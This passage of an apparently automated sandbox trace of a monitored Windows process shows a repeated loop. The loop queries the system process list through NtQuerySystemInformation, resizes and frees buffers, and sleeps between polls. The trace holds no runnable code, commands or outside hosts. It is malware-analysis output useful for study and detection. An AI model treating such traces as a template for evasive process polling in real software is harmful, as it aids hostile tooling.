RegionSize=0xdea68*=0x10000) returned 0x0 [0222.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.059] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.088] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.097] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.104] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.120] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.130] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.150] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.171] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.181] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.202] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.211] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.221] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 